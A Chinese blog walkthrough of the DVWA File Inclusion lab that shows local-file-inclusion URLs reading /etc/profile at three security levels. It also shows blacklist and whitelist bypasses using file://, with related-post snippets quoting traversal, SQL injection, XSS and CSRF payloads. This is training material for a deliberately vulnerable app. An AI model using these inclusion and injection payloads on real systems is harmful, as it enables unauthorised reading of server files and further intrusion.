DVWA - File Inclusion (low, medium, high)

最新推荐文章于 2023-08-19 11:01:55 发布

原创最新推荐文章于 2023-08-19 11:01:55 发布 · 1.2k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#security

CTF 专栏收录该内容

13 篇文章

订阅专栏

本文详细解析了DVWA平台中不同安全级别下文件包含漏洞的利用方式，并提供了具体的绕过策略及示例代码。

low

观察URL可发现，注入点在page，low等级直接注入

http://192.168.67.22/dvwa/vulnerabilities/fi/?page=/etc/profile

返回结果如下：

# /etc/profile: system-wide .profile file for the Bourne shell (sh(1)) # and Bourne compatible shells (bash(1), ksh(1), ash(1), ...). if [ "$PS1" ]; then if [ "$BASH" ] && [ "$BASH" != "/bin/sh" ]; then # The file bash.bashrc already sets the default PS1. # PS1='\h:\w\$ ' if [ -f /etc/bash.bashrc ]; then . /etc/bash.bashrc fi else if [ "`id -u`" -eq 0 ]; then PS1='# ' else PS1='$ ' fi fi fi if [ -d /etc/profile.d ]; then for i in /etc/profile.d/*.sh; do if [ -r $i ]; then . $i fi done unset i fi export JAVA_HOME=/opt/jdk1.8.0_25 export CLASS_PATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar export PATH=$PATH:$JAVA_HOME/bin

medium

查看源码，发现以黑名单的方式过滤（删掉）了http://, https://, ../和..\

// Input validation 
$file = str_replace( array( "http://", "https://" ), "", $file ); 
$file = str_replace( array( "../", "..\"" ), "", $file );

绕过思路http转大写，使用绝对路径等等。

high

查看源码，发现以白名单的方式允许file开头的文件和include.php

// Input validation 
if( !fnmatch( "file*", $file ) && $file != "include.php" )

绕过思路，以file://协议读取文件即可，注入代码如下：

http://192.168.67.22/dvwa/vulnerabilities/fi/?page=file:///etc/profile

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

jchalex

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

DVWA--File Inclusion(文件包含)（全难度）

wwxxee

02-20

357

DVWA–File Inclusion(文件包含) 原理参考：网络安全笔记-99-渗透-文件包含逻辑 page参数的值不同，包含的文件不同。难度分级 Low 核心代码分析：该级别没有对参数进行任何过滤。利用包含本地文件： http://192.168.17.141/DVWA/vulnerabilities/fi/?page=C:\Windows\System32\drivers\etc\hosts 本地文件包含目录穿越： http://192.168.17.141/DVWA/vulnera

DVWA靶场——File Inclusion

sucker的博客

11-27

2358

例如，常见的file://协议用于读取本地文件，而php://协议则是PHP特有的协议，用于访问PHP内部流或执行某些特定操作。：许多服务器会在 PHP 配置中禁用文件包含功能，或者启用了 open_basedir、safe_mode 等安全设置，限制了包含文件的路径和范围，从而减少了攻击者通过 LFI 漏洞访问系统文件的能力。经过前面的测试知道存在文件包含漏洞，那么还可以测试有无远程文件包含，思路就是通过远程文件包含从攻击者搭建的服务器下载恶意的木马文件，以获取该网站的webshell。

参与评论您还未登录，请先登录后发表或查看评论

DVWA-File Inclusion

weixin_44866139的博客

02-07

346

文件包含是指应用程序加载的文件（本地/远程）可以由用户提交的数据控制，从而导致攻击者控制恶意文件在服务器上执行. 对于php来说，常见的文件包含函数有如下： require:找不到被包含的文件，报错，并且停止运行脚本。 include:找不到被包含的文件,只会报错，但会继续运行脚本。 require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。 include_...

DVWA-File Inclusion（文件包含）

Cwillchris的博客

10-28

2650

实验环境： DVWA靶机：172.16.12.10 windos攻击机：172.16.12.7 kali攻击机：172.16.12.30 实验步骤： FileInclusion，意思是文件包含（漏洞），是指当服务器开启 allow_url_include选项时，就可以通过php的某些特性函数（include()， require()和include_once()，require_once()）利用url去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。.

DVWA-文件包含（File Inclusion）

weixin_58954236的博客

08-19

689

文件包含：开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含。文件包含漏洞：开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。文件包含是利用函数来包含web目录以外的文件，分为本地包含和远程包含。

dvwa之File Inclusion

Alsn86的博客

02-04

869

dvwa之File Inclusion 进行包含的文件名由get方法的page参数传递看一下包含的流程吧 index.php <?php define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' ); require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php'; dvwaPageStartup( array( 'authenticated', 'phpids' ) ); $page =

DVWA系列File Inclusion

crystal919的博客

03-26

367

File Inclusion，意思是文件包含（漏洞），是指当服务器开启allow_url_include选项时，就可以通过php的某些特性函数（include()，require()和include_once()，require_once()）利用url去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞，远程...

漏洞复现篇——文件包含漏洞（DVWA靶场---File Inclusion【低中高级绕过】）

爱国小白帽

02-19

4327

实验环境： PHPstudy DVWA靶场菜刀环境搭建 1、将DVWA Security級別换成low 2、打开php的配置文件，搜索allow_url_include，把off换成on，然后重启模拟实验本地文件包含(LFI) 1、点击File Inclusion中的file1.php 2、在图示位置输入C:\Windows\System32\drivers\etc\hosts...

【DVWA】File Inclusion

qq_43665434的博客

03-01

317

【DVWA】File Inclusion 一、low级别 1、测试流程 (1)local 发现文件名是通过url传递的于是尝试更改page参数内容替换为：..\..\..\..\..\..\..\..\password.txt 如图所示，成功爆出根目录下password.txt文件下的内容，此为本地文件包含。 (2)remote 搭建一个站点，写入一个木马文件将page参数内容替换为木马文件的url地址加上参数x，传入cmd命令： http://10.245.3.237/dvwa/vulner

DVWA之File Inclusion（文件包含）

weixin_41182861的博客

06-04

320

前言

DVWA 之 File Inclusion

baynk的博客

10-29

1034

汇总链接： https://baynk.blog.youkuaiyun.com/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ File...

DVWA系列之14 文件包含漏洞分析

weixin_34284188的博客

11-14

224

程序开发人员通常会把可重复使用的函数写入到单个文件中，在使用某些函数时，直接调用此文件，而无需再次编写，这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活，所以通常会将被包含的文件设置为变量，用来进行动态调用，但正是由于这种灵活性，从而导致客户端可以调用一个恶意文件，造成文件包含漏洞。 PHP中提供了四个文件包含的函数，分别是include...

DVWA之 File Inclusion

chtdgf的博客

02-23

211

DVWA之 File Inclusion 1.LOW级别 1.PHP代码分析我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 服务器获取 page 的值，没有进行任何过滤。二 MEDIUM级别 1.PHP代码分析我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file

DVWA之File Inclusion

Sukiugg的博客

07-28

310

1. url改为： http://192.168.131.148/dvwa/vulnerabilities/fi/?page=/etc/passwd

DVWA通关之File Inclusion

ZJLE的博客

08-06

292

DVWA通关之File InclusionLow：Medium：High： File Inclusion，意思是文件包含（漏洞），是指当服务器开启allow_url_include选项时，就可以通过php的某些特性函数（include()，require()和include_once()，require_once()）利用url去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞，远程文件包含漏洞是因为开启了php配置中

DVWA-----------File Inclusion

haha1314的博客

05-19

525

文件包含漏洞开发人员将相同的函数写入单独的文件中，需要使用某个函数时直接调用此文件，无需再次编写，这种文件调用的过程称文件包含；开发人员为了使代码更灵活，会将被包含的文件设置为变量，用来进行动态调用，从而导致客户端可以恶意调用一个恶意文件，造成文件包含漏洞；在PHP中经常出现文件包含漏洞；常用函数 include()：找不到被包含文件，报错，但会继续运行脚本； include_once()：...

DVWA通关 File Inclusion

干铮的博客

08-06

279

文件包含漏洞 File Inclusion 程序开发⼈员通常会把可重复使⽤函数写到单个⽂件中，在使⽤某个函数的时候，直接调⽤此⽂件，⽆需再次编写，这种调⽤⽂件的过程通常称为包含。程序开发⼈员都希望代码更加灵活，所以会把被包含的⽂件的路径设置为变量，来进⾏动态调⽤，但是正是由于这种灵活性，如果被包含⽂件的路径客户端可控，造成⽂件包含漏洞。⼏乎所有的脚步都会提供⽂件包含的功能，⽂件包含漏洞在PHP 的Web 应⽤中居多，在JSP/ASP/ASP.NET 程序中⽐较少。文件包含的原理配置文件开启文

【工具-DVWA】DVWA渗透系列四：File Inclusion

qqchaozai的专栏

10-22

2908

前言 DVWA安装使用介绍，见：【工具-DVWA】DVWA的安装和使用本渗透系列包含最新DVWA的14个渗透测试样例： 1.Brute Force(暴力破解)2.Command Injection（命令注入）3.CSRF(跨站请求伪造)4.File Inclusion（文件包含）5.File Uploa...

dvwa-http

最新发布

07-01

### DVWA HTTP Vulnerabilities Testing Guide DVWA (Damn Vulnerable Web Application) 是一个故意设计为存在漏洞的Web应用，主要用于教育和测试目的。它可以帮助安全研究人员、渗透测试人员和开发人员了解常见的Web应用程序漏洞及其利用方式。 #### 1. **HTTP方法与请求类型** 在进行DVWA漏洞测试时，理解HTTP方法（如GET、POST）是基础。DVWA中大多数漏洞都通过这些方法触发，尤其是在SQL注入、XSS和命令注入等场景中。 - GET请求通常用于从服务器获取数据，参数直接暴露在URL中。 - POST请求则常用于提交敏感信息，参数隐藏在请求体中。 ```python import requests # 示例：使用Python发送GET请求 response = requests.get('http://dvwa.local/login.php', params={'username': 'admin', 'password': 'password'}) print(response.text) # 示例：使用Python发送POST请求 data = {'username': 'admin', 'password': 'password'} response = requests.post('http://dvwa.local/login.php', data=data) print(response.text) ``` #### 2. **常见漏洞测试指南** ##### **SQL注入 (SQL Injection)** DVWA提供了不同安全级别的SQL注入漏洞，允许测试者尝试不同的注入技巧。例如，可以通过`UNION SELECT`来猜测字段数量并提取数据库信息 [^4]。 ```sql -- 示例：尝试登录绕过 ' OR '1'='1 -- 示例：使用UNION查询获取数据库版本 1' UNION SELECT NULL, version() # ``` ##### **跨站脚本攻击 (XSS)** DVWA支持反射型和存储型XSS漏洞的测试。攻击者可以插入恶意脚本以窃取会话cookie或执行其他恶意操作。 ```html  <script>alert('XSS')</script>  <img src="x" onerror="alert('Stored XSS')"> ``` ##### **命令注入 (Command Injection)** DVWA中的命令注入漏洞允许攻击者通过输入执行任意系统命令。此漏洞通常出现在未正确过滤用户输入的情况下。 ```bash # 示例：执行系统命令 127.0.0.1; ls -la ``` ##### **文件包含 (File Inclusion)** 本地文件包含（LFI）和远程文件包含（RFI）漏洞可以在DVWA中找到。这些漏洞可能导致服务器上的任意文件被读取或执行。 ```php // 示例：利用LFI读取配置文件 ?page=../../etc/passwd ``` ##### **CSRF (Cross-Site Request Forgery)** DVWA也包含了CSRF漏洞，攻击者可以诱导用户在不知情的情况下执行非预期的操作，比如更改密码或发送数据。 ```html  <form action="http://dvwa.local/change_password.php" method="POST"> <input type="hidden" name="password_new" value="hacked" /> <input type="hidden" name="password_conf" value="hacked" /> <input type="submit" value="Click Me" /> </form> ``` #### 3. **安全级别设置** DVWA提供多种安全级别（Low, Medium, High, Impossible），每种级别对漏洞的防护程度不同。建议依次测试每个级别以理解不同防护机制的效果。 - **Low**：几乎没有任何保护措施。 - **Medium**：增加了基本的过滤规则。 - **High**：采用更严格的过滤策略，但仍可能存在绕过方法。 - **Impossible**：理论上无法被攻破，适合学习最佳实践。 #### 4. **防御建议** 针对DVWA中出现的漏洞，开发者应采取以下措施加强安全性： - 对所有用户输入进行严格的验证和过滤。 - 使用预编译语句防止SQL注入。 - 对输出进行HTML实体编码以避免XSS。 - 避免动态执行用户提供的代码或命令。 - 实施CSRF令牌机制确保请求来源合法性。 ---